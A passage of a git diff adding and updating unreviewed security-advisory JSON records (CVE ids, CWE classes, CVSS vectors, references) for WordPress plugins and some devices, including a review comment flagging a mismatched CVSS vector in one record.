 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:25Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-2cv8-fr2g-g66g/GHSA-2cv8-fr2g-g66g.json b/advisories/unreviewed/2026/02/GHSA-2cv8-fr2g-g66g/GHSA-2cv8-fr2g-g66g.json
new file mode 100644
index 0000000000000..276bd8463cd37
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2cv8-fr2g-g66g/GHSA-2cv8-fr2g-g66g.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2cv8-fr2g-g66g",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69366"
+ ],
+ "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Emerce Core emerce-core allows Blind SQL Injection.This issue affects Emerce Core: from n/a through <= 1.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69366"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/emerce-core/vulnerability/wordpress-emerce-core-plugin-1-8-sql-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:20Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2fcj-pq3f-v8fp/GHSA-2fcj-pq3f-v8fp.json b/advisories/unreviewed/2026/02/GHSA-2fcj-pq3f-v8fp/GHSA-2fcj-pq3f-v8fp.json
index 0cc626d72fc5b..87df449b47a04 100644
--- a/advisories/unreviewed/2026/02/GHSA-2fcj-pq3f-v8fp/GHSA-2fcj-pq3f-v8fp.json
+++ b/advisories/unreviewed/2026/02/GHSA-2fcj-pq3f-v8fp/GHSA-2fcj-pq3f-v8fp.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2fcj-pq3f-v8fp",
- "modified": "2026-02-19T18:31:52Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:52Z",
 "aliases": [
 "CVE-2026-25364"
 ],
 "details": "Missing Authorization vulnerability in BoldGrid Client Invoicing by Sprout Invoices sprout-invoices allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Client Invoicing by Sprout Invoices: from n/a through <= 20.8.8.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:19Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-2rf2-f6mm-2232/GHSA-2rf2-f6mm-2232.json b/advisories/unreviewed/2026/02/GHSA-2rf2-f6mm-2232/GHSA-2rf2-f6mm-2232.json
new file mode 100644
index 0000000000000..5a2645e276c5e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2rf2-f6mm-2232/GHSA-2rf2-f6mm-2232.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2rf2-f6mm-2232",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69325"
+ ],
+ "details": "Path Traversal: '.../...//' vulnerability in primersoftware Primer MyData for Woocommerce primer-mydata allows Path Traversal.This issue affects Primer MyData for Woocommerce: from n/a through <= 4.2.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69325"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/primer-mydata/vulnerability/wordpress-primer-mydata-for-woocommerce-plugin-4-2-8-path-traversal-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-35"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:19Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2rfp-jrr8-m33f/GHSA-2rfp-jrr8-m33f.json b/advisories/unreviewed/2026/02/GHSA-2rfp-jrr8-m33f/GHSA-2rfp-jrr8-m33f.json
index db28de7be18e1..847458f3541ad 100644
--- a/advisories/unreviewed/2026/02/GHSA-2rfp-jrr8-m33f/GHSA-2rfp-jrr8-m33f.json
+++ b/advisories/unreviewed/2026/02/GHSA-2rfp-jrr8-m33f/GHSA-2rfp-jrr8-m33f.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2rfp-jrr8-m33f",
- "modified": "2026-02-19T18:31:51Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:51Z",
 "aliases": [
 "CVE-2026-25008"
 ],
 "details": "Insertion of Sensitive Information Into Sent Data vulnerability in Shahjahan Jewel Ninja Tables ninja-tables allows Retrieve Embedded Sensitive Data.This issue affects Ninja Tables: from n/a through <= 5.2.5.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-201"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:14Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json b/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json
new file mode 100644
index 0000000000000..5dfb584412d72
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2v7m-mcj3-m7h7/GHSA-2v7m-mcj3-m7h7.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2v7m-mcj3-m7h7",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68842"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in totalbounty Widget Logic Visual widget-logic-visual allows Reflected XSS.This issue affects Widget Logic Visual: from n/a through <= 1.52.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68842"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/widget-logic-visual/vulnerability/wordpress-widget-logic-visual-plugin-1-52-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2wf2-988r-jv99/GHSA-2wf2-988r-jv99.json b/advisories/unreviewed/2026/02/GHSA-2wf2-988r-jv99/GHSA-2wf2-988r-jv99.json
new file mode 100644
index 0000000000000..62f56fdafcf68
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2wf2-988r-jv99/GHSA-2wf2-988r-jv99.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2wf2-988r-jv99",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69374"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in SolverWp Eleblog – Elementor Blog And Magazine Addons ele-blog allows PHP Local File Inclusion.This issue affects Eleblog – Elementor Blog And Magazine Addons: from n/a through <= 2.0.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69374"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/ele-blog/vulnerability/wordpress-eleblog-elementor-blog-and-magazine-addons-plugin-2-0-3-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:21Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json b/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json
new file mode 100644
index 0000000000000..247b941cc007e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2whc-3gm8-r8v3/GHSA-2whc-3gm8-r8v3.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2whc-3gm8-r8v3",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68844"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DaleAB Membee Login membees-member-login-widget allows Reflected XSS.This issue affects Membee Login: from n/a through <= 2.3.6.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68844"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/membees-member-login-widget/vulnerability/wordpress-membee-login-plugin-2-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2x2g-fcpp-7fr9/GHSA-2x2g-fcpp-7fr9.json b/advisories/unreviewed/2026/02/GHSA-2x2g-fcpp-7fr9/GHSA-2x2g-fcpp-7fr9.json
new file mode 100644
index 0000000000000..4c460d9b9704c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2x2g-fcpp-7fr9/GHSA-2x2g-fcpp-7fr9.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2x2g-fcpp-7fr9",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-1842"
+ ],
+ "details": "HyperCloud versions 2.3.5 through 2.6.8 improperly allowed refresh tokens to be used directly for resource access and failed to invalidate previously issued access tokens when a refresh token was used. Because refresh tokens have a significantly longer lifetime (default one year), an authenticated client could use a refresh token in place of an access token to maintain long-term access without token rotation. Additionally, old access tokens remained valid after refresh, enabling concurrent or extended use beyond intended session boundaries. This vulnerability could allow prolonged unauthorized access if a token is disclosed.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1842"
+ },
+ {
+ "type": "WEB",
+ "url": "https://advisories.softiron.cloud"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-613"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:50Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json b/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json
new file mode 100644
index 0000000000000..0fd2b97c7be9c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-343f-9rcg-8p42/GHSA-343f-9rcg-8p42.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-343f-9rcg-8p42",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-24941"
+ ],
+ "details": "Missing Authorization vulnerability in wpjobportal WP Job Portal wp-job-portal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Job Portal: from n/a through <= 2.4.4.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24941"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/wp-job-portal/vulnerability/wordpress-wp-job-portal-plugin-2-4-4-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:38Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-37wf-f6wc-vqj8/GHSA-37wf-f6wc-vqj8.json b/advisories/unreviewed/2026/02/GHSA-37wf-f6wc-vqj8/GHSA-37wf-f6wc-vqj8.json
new file mode 100644
index 0000000000000..8c1589bb0379f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-37wf-f6wc-vqj8/GHSA-37wf-f6wc-vqj8.json
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-37wf-f6wc-vqj8", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69305" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Crete Core crete-core allows Blind SQL Injection.This issue affects Crete Core: from n/a through <= 1.4.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69305" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/crete-core/vulnerability/wordpress-crete-core-plugin-1-4-3-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json b/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json new file mode 100644 index 0000000000000..cc3933f36feaf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-38fx-8cr9-9925/GHSA-38fx-8cr9-9925.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-38fx-8cr9-9925", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-27072" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PixelYourSite PixelYourSite – Your smart PIXEL (TAG) Manager pixelyoursite allows Stored XSS.This issue affects PixelYourSite – Your smart PIXEL (TAG) Manager: from n/a through <= 11.2.0.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27072" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/pixelyoursite/vulnerability/wordpress-pixelyoursite-your-smart-pixel-tag-manager-plugin-11-2-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-38gw-g59j-rr5c/GHSA-38gw-g59j-rr5c.json b/advisories/unreviewed/2026/02/GHSA-38gw-g59j-rr5c/GHSA-38gw-g59j-rr5c.json new file mode 100644 index 0000000000000..0985a4267f76f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-38gw-g59j-rr5c/GHSA-38gw-g59j-rr5c.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-38gw-g59j-rr5c", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26098" + ], + "details": "Uncontrolled Search Path Element in Owl opds 2.2.0.4 allows Leveraging/Manipulating Configuration File Search Paths via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26098" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26098" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-427" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3cmc-gqgq-xmxq/GHSA-3cmc-gqgq-xmxq.json b/advisories/unreviewed/2026/02/GHSA-3cmc-gqgq-xmxq/GHSA-3cmc-gqgq-xmxq.json index a894d62b25454..6917562c321e0 100644 --- a/advisories/unreviewed/2026/02/GHSA-3cmc-gqgq-xmxq/GHSA-3cmc-gqgq-xmxq.json +++ b/advisories/unreviewed/2026/02/GHSA-3cmc-gqgq-xmxq/GHSA-3cmc-gqgq-xmxq.json 
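Review bot: In GHSA-38gw-g59j-rr5c the CVSS 4.0 vector and the `details` text disagree: the `score` line starts `CVSS:4.0/AV:L/AC:L/AT:N/PR:H/...` (local access, high privileges), while the description says the search-path issue is reached "via a crafted network request". The sibling Owl opds record GHSA-42vx-f9wx-wg3r in this same commit uses `AV:N/.../PR:L` with the same phrasing, so one of the two fields here may have been carried over from a template. Because `affected` is empty and the record is unreviewed, the vector and `"severity": "HIGH"` are the only machine-readable triage signals. They should be checked against the referenced Nozomi advisory and whichever field is wrong corrected at the source.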
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3cmc-gqgq-xmxq", - "modified": "2026-02-19T18:31:52Z", + "modified": "2026-02-20T18:31:27Z", "published": "2026-02-19T18:31:52Z", "aliases": [ "CVE-2026-25324" ], "details": "Authorization Bypass Through User-Controlled Key vulnerability in ExpressTech Systems Quiz And Survey Master quiz-master-next allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quiz And Survey Master: from n/a through <= 10.3.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-639" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:16Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3fr7-jch8-4qjv/GHSA-3fr7-jch8-4qjv.json b/advisories/unreviewed/2026/02/GHSA-3fr7-jch8-4qjv/GHSA-3fr7-jch8-4qjv.json new file mode 100644 index 0000000000000..6c3c56b22be48 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3fr7-jch8-4qjv/GHSA-3fr7-jch8-4qjv.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fr7-jch8-4qjv", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24455" + ], + "details": "The embedded web interface of the device does not support HTTPS/TLS for \nauthentication and uses HTTP Basic Authentication. Traffic is encoded \nbut not encrypted, exposing user credentials to passive interception by \nattackers on the same network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24455" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-03.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json b/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json new file mode 100644 index 0000000000000..1df04f7de316b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3g7r-h8fj-xc5g/GHSA-3g7r-h8fj-xc5g.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3g7r-h8fj-xc5g", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22378" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Blabber blabber allows PHP Local File Inclusion.This issue affects Blabber: from n/a through <= 1.7.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22378" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/blabber/vulnerability/wordpress-blabber-theme-1-7-0-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3h5g-fffj-jhx9/GHSA-3h5g-fffj-jhx9.json b/advisories/unreviewed/2026/02/GHSA-3h5g-fffj-jhx9/GHSA-3h5g-fffj-jhx9.json new file mode 100644 index 0000000000000..2dca3f5e8714b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3h5g-fffj-jhx9/GHSA-3h5g-fffj-jhx9.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3h5g-fffj-jhx9", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68841" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Themepul TopperPack – Complete Elementor Addons, Theme & CPT Builder topper-pack allows PHP Local File Inclusion.This issue affects TopperPack – Complete Elementor Addons, Theme & CPT Builder: from n/a through <= 1.2.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68841" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/topper-pack/vulnerability/wordpress-topperpack-complete-elementor-addons-theme-cpt-builder-plugin-1-1-0-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3mfv-m4f8-5m67/GHSA-3mfv-m4f8-5m67.json b/advisories/unreviewed/2026/02/GHSA-3mfv-m4f8-5m67/GHSA-3mfv-m4f8-5m67.json new file mode 100644 index 0000000000000..d20a64e42d05f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3mfv-m4f8-5m67/GHSA-3mfv-m4f8-5m67.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mfv-m4f8-5m67", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68021" + ], + "details": "Missing Authorization vulnerability in ConveyThis ConveyThis conveythis-translate allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ConveyThis: from n/a through <= 269.5.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68021" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/conveythis-translate/vulnerability/wordpress-conveythis-plugin-268-10-broken-access-control-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3pw3-vpq3-qmc9/GHSA-3pw3-vpq3-qmc9.json b/advisories/unreviewed/2026/02/GHSA-3pw3-vpq3-qmc9/GHSA-3pw3-vpq3-qmc9.json new file mode 100644 index 0000000000000..06a0b1639c347 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3pw3-vpq3-qmc9/GHSA-3pw3-vpq3-qmc9.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3pw3-vpq3-qmc9", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69399" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Cobble cobble allows PHP Local File Inclusion.This issue affects Cobble: from n/a through <= 1.7.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69399" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/cobble/vulnerability/wordpress-cobble-theme-1-7-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json b/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json new file mode 100644 index 0000000000000..6e09c9e1285cf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3r56-xx7r-cr9c/GHSA-3r56-xx7r-cr9c.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3r56-xx7r-cr9c", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69388" + ], + "details": "Missing Authorization vulnerability in cliengo Cliengo – Chatbot cliengo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cliengo – Chatbot: from n/a through <= 3.0.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69388" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/cliengo/vulnerability/wordpress-cliengo-chatbot-plugin-3-0-4-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3rcg-gg9q-9688/GHSA-3rcg-gg9q-9688.json b/advisories/unreviewed/2026/02/GHSA-3rcg-gg9q-9688/GHSA-3rcg-gg9q-9688.json new file mode 100644 index 0000000000000..4c7ed472a62e5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3rcg-gg9q-9688/GHSA-3rcg-gg9q-9688.json 
